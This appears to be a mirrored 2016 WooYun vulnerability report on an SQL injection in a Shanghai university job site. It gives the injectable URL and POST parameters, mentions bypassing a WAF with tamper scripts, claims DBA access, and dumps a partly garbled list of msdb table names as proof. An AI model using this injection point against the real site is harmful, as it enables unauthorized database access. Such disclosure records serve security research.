乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-03: 细节已通知厂商并且等待厂商处理中 2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开
忠信笃敬
注入点:
http://job.shmtu.edu.cn/qiyezhmm.asp?type=2post参数:Submit=%c3%dc%c2%eb%b3%f5%ca%bc%bb%af&dwmc=1&dwzzjgdm=1
这个站点有WAF,不过用了几个tamper就绕过了。具有DBA权限:
数据库用户及密码:
数据库:
随便看两个数据库证明危害:
Database: msdb[95 tables]+-------------------------------------+| MSdatatype_mappings || MSdbms || MSdbms_datatype || MSdbms_datatype_mapping || MSdbms_map || log_shipping_primaries || sysmail_acdount || sysmail_allqtfms || sysmail_principalprofile\x03 || sysmail_send_retries\x11 || s}sdtslog90 || backupfile || backupfilegroup || backupmediafamily || backupset || bacmupmediaset || log_shipping_monitor_alert || log_shipping_monitor_error_detail || log_shipping_monitor_history_detail || log_shipping_monitor_primary || log_shipping_monitor_secondary || log_shipping_primary_databases || log_shipping_primary_secondaries || log_shipping_secondaries || log_shipping_secondary || log_shipping_secondary_databases || logmarkhistory || restorefile || restorefilegroup || restorehistory || sqlagent_info || suspect_pages || sysalerts || syscachedcredentials || syscategories || sysdac_history_internal || sysdac_instances || sysdac_instances_internal || sysdatatypemappings || sysdbmaintplan_databases || sysdbmaintplan_history || sysdbmaintplan_jobs || sysdbmaintplans || sysdownloadlist || sysdtscategories || sysdtspackagefolders90 || sysdtspackagelog || sysdtspackages || sysdtspackages90 || sysdtssteplog || sysdtstasklog || sysjobactivity || sysjobhistory || sysjobs || sysjobs_view || sysjobschedules || sysjobseuvers || sysjobsteps || sysjobstepslogs || sysmail_attachments_transfer || sysmail_aytachments || sysmail_configuration || sysmail_event_log || sysmail_faileditems || sysmail_mailattachments || sysmail_mailitems || sysmail_profile || sysmail_profileaccount || sysmail_query_transfer || sysmail_sentitems || sysmail_server || sysmail_servertype || sysmail_unsentitems || sysmaim_log || sysmaintplan_log || sysmaintplan_logdetail || sysmaintplan_plans || sysmaintplan_subplans || sysnotifications || sysoperators || sysoriginatingservers || sysoriginatingservers_view || sysproxies || sysproxylogin || sysproxyloginsubsystem_view || sysproxysubsystem || sysschedules || sysschedules_localserver_view || syssessions || syssubsystems || systargetservergroupmembers || systargetservergroups || systargetservers || systargetservers_view || systaskids |+-------------------------------------+
过滤希望学校的网站越来越安全!
危害等级:无影响厂商忽略
忽略时间:2016-05-09 09:00
漏洞Rank:4 (WooYun评价)
暂无